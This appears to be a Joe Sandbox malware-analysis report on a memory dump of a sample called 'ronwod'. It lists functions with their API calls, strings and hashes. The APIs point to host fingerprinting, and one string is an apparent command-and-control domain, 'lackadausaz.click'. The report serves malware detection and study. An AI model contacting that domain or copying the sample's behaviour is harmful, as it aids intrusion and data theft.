Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: 9.$9.
API String ID: 2994545307-2940951921
Opcode ID: 08a69e3fee71740a56ce4bcec4354a1e8271fd6b7e69d19bb3a512764e2f6e82
Instruction ID: 72c5253c36aae28ea5527648058538238c2dc9fdef66cfceeb40fd6d52c66747
Opcode Fuzzy Hash: 08a69e3fee71740a56ce4bcec4354a1e8271fd6b7e69d19bb3a512764e2f6e82
Instruction Fuzzy Hash: B6414671A051206FD3049B2DDE50B26B792EBD5309F19E639D984F73D6DA329C158680

Function 00EBC8D0 Relevance: 1.9, APIs: 1, Instructions: 364COMMON

Download Yara Rule

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00EBCF80

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID:
API String ID: 3960555810-0
Opcode ID: e113191d7392072b9b5b583a86f303c1f4e251018d16809f6f48218a6969ff70
Instruction ID: 65257cfa0c684b6457d648883189c63d721d25cc4e98b764fbfcbc9e48b79d01
Opcode Fuzzy Hash: e113191d7392072b9b5b583a86f303c1f4e251018d16809f6f48218a6969ff70
Instruction Fuzzy Hash: 5AA1B17160C3818BD729CF2AC8513ABBBE2AFD6304F18986EE0D597391E7798405CB52

Function 00EA4E25 Relevance: 1.8, APIs: 1, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7b76a45d0949819f312311c779b30a885eb2ca35c232940f5dd82bed4d583b4
Instruction ID: 92458c21b215c759d6c8ba629756d7b4ab4369260008033dac79092fcca4bf1f
Opcode Fuzzy Hash: d7b76a45d0949819f312311c779b30a885eb2ca35c232940f5dd82bed4d583b4
Instruction Fuzzy Hash: D4A118B65082819FD7248B28C49067EBBE1BFDE304F18492DE0DADB382D635E945CB52

Function 00ECFB10 Relevance: 1.6, Strings: 1, Instructions: 360COMMON

Download Yara Rule

Strings

mLjL, xrefs: 00ECFB90

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: mLjL
API String ID: 2994545307-1911556848
Opcode ID: 6726400aeeec1e2633dba52f719364f9044e05863d7cccd0cf2faa4ec337c610
Instruction ID: 6342e17682d9cc810ddfc6227dd207c4b29dd8fbe83684d2f235648d14eae585
Opcode Fuzzy Hash: 6726400aeeec1e2633dba52f719364f9044e05863d7cccd0cf2faa4ec337c610
Instruction Fuzzy Hash: 8DB1F832A043118FD728CF14D991A6FB7A3EFC4714F16953CD99A673A1DB32AC068781

Function 00ECCD20 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00ED009B,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00ECCD4E

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 00E9C942 Relevance: 1.4, Strings: 1, Instructions: 141COMMON

Download Yara Rule

Strings

G9, xrefs: 00E9C992

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: G9
API String ID: 0-2716091189
Opcode ID: 781025c217029823692565a24b45e3525d8e8b50d5ce25564504ed8ed4be5af8
Instruction ID: a105941b3bcbed6871f75299f73ee60aa0a89728a2eba102da133fec17e6c309
Opcode Fuzzy Hash: 781025c217029823692565a24b45e3525d8e8b50d5ce25564504ed8ed4be5af8
Instruction Fuzzy Hash: CD4158736483218BCB28DF15DC5166BB7B2EFC5304F1A591CE4866BB90E778D504C746

Function 00ED00C0 Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

@, xrefs: 00ED0172

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: e637402d34e722bad1d1556a9a5557675d89ae7c8ad031dc785cfdb924f7ec44
Instruction ID: e17473e48f13ff8041e0e60cedbca5c032d8ebcceae0203179c2a76ad4aaafe0
Opcode Fuzzy Hash: e637402d34e722bad1d1556a9a5557675d89ae7c8ad031dc785cfdb924f7ec44
Instruction Fuzzy Hash: 754153719093108FC714CF14DC85B6FB7E1EF94318F18992DE9892B3A1E776980AC782

Function 00ECD9C1 Relevance: 1.4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

@, xrefs: 00ECDA4D

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: a86e7263d2bcc38e2bd2915ac56b1b5208827b0e6cc2eb0e34edba85c6c8ee8d
Instruction ID: 2e7479fe94439b00dc7e2008772eeb7958b95a7c723559608cac5a955a6ae3f4
Opcode Fuzzy Hash: a86e7263d2bcc38e2bd2915ac56b1b5208827b0e6cc2eb0e34edba85c6c8ee8d
Instruction Fuzzy Hash: CC41EFB0A092109FD718CF25CE51B3B77E2EFC1709F14A92DE485A7395E7729C068792

Function 00ECF040 Relevance: 1.3, Strings: 1, Instructions: 92COMMON

Download Yara Rule

Strings

@, xrefs: 00ECF090

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: e02fec741198a5a7279639678eb7ff08a7a61b6d173cfb8ccb509e268ae5ac11
Instruction ID: 5f04ebc75001a95f4e817d8a2c077991d7305159899f6e3019f07586ad9d0d91
Opcode Fuzzy Hash: e02fec741198a5a7279639678eb7ff08a7a61b6d173cfb8ccb509e268ae5ac11
Instruction Fuzzy Hash: 1B21C0B50193049FC310CF14E980A6BB7F6FFC5324F15692CE998A7261D372E949C752

Function 00ECF150 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f050f75d64a5ab9af34cf8cb7ff83d270391e2affdf63f751344c6b926dd7e0e
Instruction ID: 970515292eb10875b275ea3d4e9b05bf76e97e6258a4387d446222410cad1356
Opcode Fuzzy Hash: f050f75d64a5ab9af34cf8cb7ff83d270391e2affdf63f751344c6b926dd7e0e
Instruction Fuzzy Hash: 5D8118366042119FCB249F18CD50BAEB7A3FFC4714F1AA53CE995AB265DB31AC128781

Function 00EC7960 Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9620794faff5dc0269c31db0f555b0a9623ac6d4193bcc899ed523c6ab8f4e3f
Instruction ID: 5536b38eab14e269fda0bf11b38005444efe5b2010a805eda6e1e125aa3cb046
Opcode Fuzzy Hash: 9620794faff5dc0269c31db0f555b0a9623ac6d4193bcc899ed523c6ab8f4e3f
Instruction Fuzzy Hash: 17A1F832A092158FDB00CF78CA81BEEBBE2EF88310F15952ED495A7395D67A4D47CB41

Function 00ECB1D0 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: be04186e18b9fdda8b1f2098d9d82c21f15ada79fe2fd06d0a99d2e788835ac8
Instruction ID: 8b1d51a8aecc52a2537875dc170e67f993ac4941703fd6da747e8f3fb6cd7dd3
Opcode Fuzzy Hash: be04186e18b9fdda8b1f2098d9d82c21f15ada79fe2fd06d0a99d2e788835ac8
Instruction Fuzzy Hash: 73513435A083149FD724AF29CA41B6FB3A6FBD4704F16943DD9846B362E7736C128B81

Function 00E9C621 Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a39fc1b5b3afec643c349549ee6bc8315773ae4dbd04da963677268c07f37b0b
Instruction ID: 29be02b01f96be3395bed4c4ecbfe9fb1ab61aaccf6210004ca223cce58f6e62
Opcode Fuzzy Hash: a39fc1b5b3afec643c349549ee6bc8315773ae4dbd04da963677268c07f37b0b
Instruction Fuzzy Hash: C9512773A942114FE718CF64CC807ABB7E2EBC4300F1A943DE989A7780EB7999055B85

Function 00EBCC5D Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a07bfef832af381943cdb7d919dbf79ebd5e9d16ecbfb178f079a1ad11b4ab5a
Instruction ID: d6c89abdc51cc21f3fd0d56d351757768e06d770ea421ab3a61e92a4ca368705
Opcode Fuzzy Hash: a07bfef832af381943cdb7d919dbf79ebd5e9d16ecbfb178f079a1ad11b4ab5a
Instruction Fuzzy Hash: 5D51AD36A5DB538BD7158A24C8C01E3BF82DF96355F2CD739C895673C1D3289405D791

Function 00EBB00F Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad7ef17dc8369edac81e4160de5be8a1f67fb308a2be43e66345e976c76c3f1b
Instruction ID: bf97150f26128a39a6371744ce3b88436ac865edddf42250bb72b5774c8c0d60
Opcode Fuzzy Hash: ad7ef17dc8369edac81e4160de5be8a1f67fb308a2be43e66345e976c76c3f1b
Instruction Fuzzy Hash: 32418121A56257CFDB149A28CC612F7F791EB25340F0C9239C456B7381E358DC09E3D1

Function 00ED04D0 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9276ff6236d2182942bd32f2b1520fc0bf03c4b1bd7fd8cb3400f7d8ecad6759
Instruction ID: b65192900389fc5ecd00600652d5eab8688578b9c08dcea79563f5890717d561
Opcode Fuzzy Hash: 9276ff6236d2182942bd32f2b1520fc0bf03c4b1bd7fd8cb3400f7d8ecad6759
Instruction Fuzzy Hash: 224126342553009FD7248F64ED81BBEB3A6EBC4318F2C652EE595AB3A1D671E8228704

Function 00E986C0 Relevance: 7.6, APIs: 5, Instructions: 92
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00E986E2
GetCurrentThreadId.KERNEL32 ref: 00E986E8
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00E986F9
GetForegroundWindow.USER32 ref: 00E987BA
ExitProcess.KERNEL32 ref: 00E987F9

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 9f759896879861efb22e8c4133f7b6dc4cd609c8170f6693715a7f21723e194b
Instruction ID: 0c86a39342740e24ae6d7dc21d272704e7632a79677e285d0f0a03484682ee56
Opcode Fuzzy Hash: 9f759896879861efb22e8c4133f7b6dc4cd609c8170f6693715a7f21723e194b
Instruction Fuzzy Hash: 8F217C71A012005FDB14BB65ED0BB9937D2DF81704F19952EE585FB2A6EE394806C292

Function 00E9E042 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 327
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 00E9E04E

Strings

&j=, xrefs: 00E9E1DE
>, xrefs: 00E9E3F1
lackadausaz.click, xrefs: 00E9E47B

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: Uninitialize
String ID: >$&j=$lackadausaz.click
API String ID: 3861434553-1851139727
Opcode ID: 9f75c3e20e2b141c281e85e997ea9b36169360871dae6b59e455811df8868cb8
Instruction ID: 8736cfafa05e037f3101573a628c8d45b9e36d9ee9ef7ddbd24c799b02511430
Opcode Fuzzy Hash: 9f75c3e20e2b141c281e85e997ea9b36169360871dae6b59e455811df8868cb8
Instruction Fuzzy Hash: 50A1DC7150D3828BD734CF29D8947ABBBA1AFD1304F28A95DC4D96B365D7390409CB92

Function 00EBBAB3 Relevance: 1.6, APIs: 1, Instructions: 91COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 00EBC98B

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 5190ec35b10ceb647b384334b9b7478edb5d7064f5603cc8135cfff6fe269e76
Instruction ID: 52df0eb3619a9144d79efe4eb1cfc9d0d4eed20016b43fe0c68ce50ff27a8f41
Opcode Fuzzy Hash: 5190ec35b10ceb647b384334b9b7478edb5d7064f5603cc8135cfff6fe269e76
Instruction Fuzzy Hash: BA21CF711193818ED3358F29C8597EBBBE1EFDA304F2C586EC4C9EB291DB7080499B11

Function 00EC6B2D Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 00EC6B5E

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: 93469b4b1fdb0810f3683207c1d4264f0b54aff4f903f463ffda8189ce4d8de2
Instruction ID: 87578c085e0203e5447744963bcfe84b91ce1c797185ecaaed9601cbddb2e097
Opcode Fuzzy Hash: 93469b4b1fdb0810f3683207c1d4264f0b54aff4f903f463ffda8189ce4d8de2
Instruction Fuzzy Hash: 37112472B112048BD718CB68CE82BEE67F2AFD8304F29907DC449E7298D93D4A068611

Function 00ECCCC0 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,00E9B4B0,00000000,00000001), ref: 00ECCCF2

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b9e023e0143409111c5c74741dbe07138c78aefa28d0ca2c5747f6bc507ea89c
Instruction ID: b067f9377d51a26d02442ae1b11449d77750ae904ff8be24ad95e67bd2e997b3
Opcode Fuzzy Hash: b9e023e0143409111c5c74741dbe07138c78aefa28d0ca2c5747f6bc507ea89c
Instruction Fuzzy Hash: 47E0E572415211EFD2112F24BE06F5B3FA8EF81720F160879F40976151DB33E8129196

Function 00E9CC13 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00E9CC25

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: dd168b3337b72980b7cd8a92cf85f63d6306f8b2b30b9416c41d33d5159f803f
Instruction ID: 410458bd52e9fcba4793f9b8329239856533cc2a3b7fe4dd2079077278ac66fe
Opcode Fuzzy Hash: dd168b3337b72980b7cd8a92cf85f63d6306f8b2b30b9416c41d33d5159f803f
Instruction Fuzzy Hash: B6E092B67E1A043EF25C462AED77F54125397E0B11F38C35EB352392D8C574A4068104

Function 00EBEBD5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00EBEC1B

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 2bb277c4cd3f0743b4b3c863bba57beddf2beaaf0b64887e6717b86f750cd40c
Instruction ID: af18d655b5f5990c80f35db170d78b72299c20f7488188cd192db53aa33099c2
Opcode Fuzzy Hash: 2bb277c4cd3f0743b4b3c863bba57beddf2beaaf0b64887e6717b86f750cd40c
Instruction Fuzzy Hash: A3F0D074109702CFD314DF25D5A871ABBF1FB84304F10881DE4958B3A0C7B6A548CF82

Function 00EC1563 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00EC15A7

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: e0973b46abddf94867deb562dcca64b44e55e18fffd1a924addf5358f472fc2e
Instruction ID: b43668fef426a91b2ef8667fd85180f34c239d08afacb020c762c785b531c1f8
Opcode Fuzzy Hash: e0973b46abddf94867deb562dcca64b44e55e18fffd1a924addf5358f472fc2e
Instruction Fuzzy Hash: 8DF0B2B42093428FE314EF29D5A871BBBE5EFC4304F11891CE4958B290CBB99948CF82

Function 00ECCE81 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00ECCE9A

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 1bd928f161067861653e9bcd83f16ce6d8bb8042d7da110988a6c6a1f16fb6e2
Instruction ID: f85d8fa445d7e485748a2c0318f19ca6354aec7839426cc3844cdc1185a7ef63
Opcode Fuzzy Hash: 1bd928f161067861653e9bcd83f16ce6d8bb8042d7da110988a6c6a1f16fb6e2
Instruction Fuzzy Hash: 88E08CB9A012529FC708DB25FD86C6533A4EB18319748442FE252E7363EA36E50BDA00

Function 00E9CBE0 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 00E9CBF3

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: cdbd39d8e48d2fc02466bcc87270c65950a2ba4ce2b49f0c5f1b3e2614251deb
Instruction ID: cf21ec668db60cce8aaec62c107e3cbbb4a8d20f0223bb7e613efd9373333fce
Opcode Fuzzy Hash: cdbd39d8e48d2fc02466bcc87270c65950a2ba4ce2b49f0c5f1b3e2614251deb
Instruction Fuzzy Hash: 0AD0A7316D11446FD244675EFC07F22375CD732715F80032AF662E65E1E9A06914D6A9

Function 00ECB1A0 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,00EA21FC), ref: 00ECB1BE

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: b61ffc40172b7c35ce2edff9f2efd3760631fdca1663de4095a304c2319d3e16
Instruction ID: b869f3449a036fa5f474e23eb67db16fe1f12689d19f13856737f076fb383da7
Opcode Fuzzy Hash: b61ffc40172b7c35ce2edff9f2efd3760631fdca1663de4095a304c2319d3e16
Instruction Fuzzy Hash: D5D0C931415122EFC7101F19BD06B8A3A94DF05321F030892B4447B1B0C661EC919694

Function 00ECB180 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,00ECF543,?,00ECF543,?,00000000,00000000,00000000,00000000), ref: 00ECB190

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0914a38f1636d7fa00437cfdaa2d35dbcf92725ad336518ba8d576672c2f0e9e
Instruction ID: 6baf0de2dfaeda8c92a3d7444ba8fb65bb7339a8633d00f3f5eed29d75a461d9
Opcode Fuzzy Hash: 0914a38f1636d7fa00437cfdaa2d35dbcf92725ad336518ba8d576672c2f0e9e
Instruction Fuzzy Hash: E6C04831055120AADA512B15EC09F8A3EA8AF553A0F060495B4487B2B1C661AC829A98

Non-executed Functions

Function 00EC5ED3 Relevance: 40.3, Strings: 32, Instructions: 339COMMON

Download Yara Rule

Strings

t, xrefs: 00EC60D1
t, xrefs: 00EC60C8
d, xrefs: 00EC60A4
{, xrefs: 00EC6002
e, xrefs: 00EC6038
{, xrefs: 00EC5FF9
c, xrefs: 00EC60BF
t, xrefs: 00EC60F5
E, xrefs: 00EC6110
s, xrefs: 00EC6092
t, xrefs: 00EC605C
O, xrefs: 00EC6122
z, xrefs: 00EC6065
y, xrefs: 00EC6041
|, xrefs: 00EC6014
s, xrefs: 00EC600B
X, xrefs: 00EC6107
|, xrefs: 00EC60AD
Y, xrefs: 00EC60FE
}, xrefs: 00EC609B
:, xrefs: 00EC5FD5
j, xrefs: 00EC6089
r, xrefs: 00EC602F
}, xrefs: 00EC6080
e, xrefs: 00EC60DA
N, xrefs: 00EC6119
`, xrefs: 00EC6026
), xrefs: 00EC5ED9
m, xrefs: 00EC60EC
f, xrefs: 00EC604A
K, xrefs: 00EC5FF0
{, xrefs: 00EC6077

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: )$:$E$K$N$O$X$Y$`$c$d$e$e$f$j$m$r$s$s$t$t$t$t$y$z${${${$|$|$}$}
API String ID: 0-2770104185
Opcode ID: 461736eb3a88b493f32d9868532717ca61d27ae1426efb2b03548fd3e383f5b9
Instruction ID: 1cc744c6c6bcaca608e8a3e778aa20e8367a800869d1046e9f451b7dda3b8ca8
Opcode Fuzzy Hash: 461736eb3a88b493f32d9868532717ca61d27ae1426efb2b03548fd3e383f5b9
Instruction Fuzzy Hash: F7E1C935A2462886DB25CF14CD417DEB3B2FF84310F5491ECC4696B361EB388A86CB4B

Function 00EB3C40 Relevance: 39.2, APIs: 2, Strings: 20, Instructions: 663COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00EB3D59
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00EB3D99

Strings

Vq, xrefs: 00EB4B78, 00EB42C2, 00EB4971, 00EB4774, 00EB474F, 00EB4579
>>, xrefs: 00EB471A
ef, xrefs: 00EB4AA2
|i, xrefs: 00EB4A98
XH, xrefs: 00EB4A2A
|s, xrefs: 00EB4A8E
9, xrefs: 00EB46D4
PR, xrefs: 00EB4A48
_p, xrefs: 00EB4A02
rl, xrefs: 00EB49D0
45, xrefs: 00EB46DE
AQ, xrefs: 00EB4A5C
<, xrefs: 00EB4724
Ys, xrefs: 00EB4A84
wY, xrefs: 00EB49EE
bo, xrefs: 00EB49E4
&Kt0, xrefs: 00EB42B5
mm, xrefs: 00EB49DA
Vq, xrefs: 00EB499E
\\, xrefs: 00EB49F8

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: 9$&Kt0$45$<$>>$AQ$PR$Vq$Vq$XH$Ys$\\$_p$bo$ef$mm$rl$wY$|i$|s
API String ID: 237503144-3538275056
Opcode ID: 09b1e7cd4fad8a2a2e7c68f9fa4795bedf9f1347db924698e8985f8d8b353daa
Instruction ID: 44465bc077462b6a843cd5e3ab750ec867c14aecefaa7443e47d2fbd034e166b
Opcode Fuzzy Hash: 09b1e7cd4fad8a2a2e7c68f9fa4795bedf9f1347db924698e8985f8d8b353daa
Instruction Fuzzy Hash: F87263B99063699BDB60DF19DC883CEBB71FB95304F108AE9C4593B290D7744A85CF82

Function 00EB3EC0 Relevance: 39.2, APIs: 1, Strings: 21, Instructions: 651COMMON

Download Yara Rule

Strings

Vq, xrefs: 00EB4B78, 00EB42C2, 00EB4971, 00EB4774, 00EB474F, 00EB4579
>>, xrefs: 00EB471A
ef, xrefs: 00EB4AA2
|i, xrefs: 00EB4A98
XH, xrefs: 00EB4A2A
